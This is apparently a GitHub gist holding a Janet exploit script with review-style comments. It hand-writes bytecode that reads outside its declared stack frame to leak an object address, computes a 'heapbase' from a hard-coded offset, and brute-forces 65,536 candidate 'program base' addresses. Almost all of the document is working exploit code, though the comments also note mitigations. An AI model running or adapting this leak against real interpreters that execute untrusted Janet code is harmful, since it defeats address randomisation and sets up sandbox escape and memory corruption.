@lionaneesh
Created April 1, 2021 03:44
# `some`: a function assembled directly from Janet bytecode (`asm`) rather
# than compiled from source. Its constants table holds the string "blah"
# (index 0) and the `print` function (index 1); the header declares arity 0
# and a frame of 2 slots.
# NOTE(review): the bytecode writes to and returns slot 2 (`mkarr 2`,
# `ret 2`) although `slotcount 2` only declares slots 0 and 1 (assuming
# slots are numbered from 0). The returned value therefore comes from
# outside the declared frame; the driver below prints and `describe`s it.
# Mitigation-wise, an assembler that validates every slot operand against
# `slotcount` would reject this function — confirm whether the Janet
# version in use performs that check.
(def some
(asm
'{
# constant 0 = "blah", constant 1 = print
constants @["blah" print]
:arity 0
# declares two slots; slot 2 referenced below is outside this count
slotcount 2
# presumably: lds = load self into slot 0, ldc = load constant into slot 1,
# push slot 1 onto the arg stack, reload slot 1, mkarr from the pushed args
# into slot 2, return slot 2
bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
}
))
# Driver script: calls `some` (defined above) and parses the textual
# representation of whatever it returns into numbers.
# Risk note (review): `describe` places the raw object address into the
# string this script slices apart, and the `asm` form above lets a script
# hand-write bytecode. An embedding that runs untrusted Janet code would
# want to withhold or validate both capabilities. All slice offsets below
# assume one specific address width/format; they are not derived at
# runtime, so verify them against the interpreter actually in use.
(def- leak_tup (some))
(print leak_tup)
# `describe` renders the value as a string — presumably of the form
# "<array 0x...>", since the trim set below strips exactly the characters
# '<', '>', 'a', 'r', 'y' and ' ' from both ends, leaving the "0x..." part.
(def- leak_str (describe leak_tup))
(def leak_addr (string/trim leak_str "<>array "))
# Split the digits after "0x" into chars [2,6) and [6,14). These fixed
# offsets assume a 12-hex-digit address — TODO confirm on the target build.
(def leak_addr1 (string/slice leak_addr 2 6))
(def leak_addr2 (string/slice leak_addr 6 14))
(def hex_p "0x")
(print leak_addr)
(print leak_addr1)
(print leak_addr2)
# Re-prefix each half with "0x" so `scan-number` parses it as hexadecimal.
(def leak_addr2h (string/join [hex_p leak_addr2]))
(def leak_addr1h (string/join [hex_p leak_addr1]))
(print leak_addr2h)
(print leak_addr1h)
(def leak_addr1i (scan-number leak_addr1h))
(def leak_addr2i (scan-number leak_addr2h))
# Hard-coded offset (216656 = 0x34e50) subtracted from the low half. Its
# value is specific to whatever build it was measured against and is not
# computed from anything in this script.
(def leak_heap_ptr2 (- leak_addr2i 216656))
# NOTE(review): `buffer` and `progleak` are bound here but never referenced
# again in this script (the `buffer/new` / `buffer/format` calls below are
# namespaced functions, not this binding).
(def- buffer (tarray/buffer 8))
(def- buffleak2 (buffer/new 16))
(def- progleak (buffer/new 16))
# Recombine as "0x" + high half + adjusted low half. Neither field is
# zero-padded (%x, not %.Nx), so a low half with leading zeros would shift
# the fixed slice offsets used on the following lines.
(buffer/format buffleak2 "0x%x%x" leak_addr1i leak_heap_ptr2)
(print "heapbase")
(print buffleak2)
# Take chars [2,7) as a prefix and [11,14) as a suffix of the combined
# value; the four digits in between are enumerated by the loop below.
(def leak_pre (string/slice buffleak2 2 7))
(def leak_suf (string/slice buffleak2 11 14))
(def leak_preh (string/join [hex_p leak_pre]))
(def leak_sufh (string/join [hex_p leak_suf]))
(def leak_prei (scan-number leak_preh))
(def leak_sufi (scan-number leak_sufh))
# NOTE(review): `found` is never assigned anywhere in this script, so the
# `:until` clause can never become true and the loop always runs the full
# 0x0..0xffff range, printing one candidate per iteration.
(var found nil)
(loop [leak_mid :range [0x0 0xffff]
:until (not= found nil)
]
# Candidate = prefix, 4-digit zero-padded middle, 3-digit zero-padded suffix.
(def- buffleak3 (buffer/new 16))
(buffer/format buffleak3 "0x%x%.4x%.3x" leak_prei leak_mid leak_sufi)
(print buffleak3)
# Split the candidate into chars [2,8) and [8,14), parse each as hex, and
# re-emit it as "0x%x%.6x" (second half zero-padded to 6 digits, first half
# not). Nothing is compared or stored; the result is only printed.
(def leak_prog_1 (string/slice buffleak3 2 8))
(def leak_prog_1h (string/join [hex_p leak_prog_1]))
(def leak_prog_1i (scan-number leak_prog_1h))
(def leak_prog_2 (string/slice buffleak3 8 14))
(def leak_prog_2h (string/join [hex_p leak_prog_2]))
(def leak_prog_2i (scan-number leak_prog_2h))
(def leak_prog_f (buffer/new 16))
(buffer/format leak_prog_f "0x%x%.6x" leak_prog_1i leak_prog_2i)
(print "possible program base addr")
(print leak_prog_f)
)
# Pause after the loop. NOTE(review): `os/sleep` takes seconds, not
# milliseconds — confirm a 200-second pause is intended.
(os/sleep 200)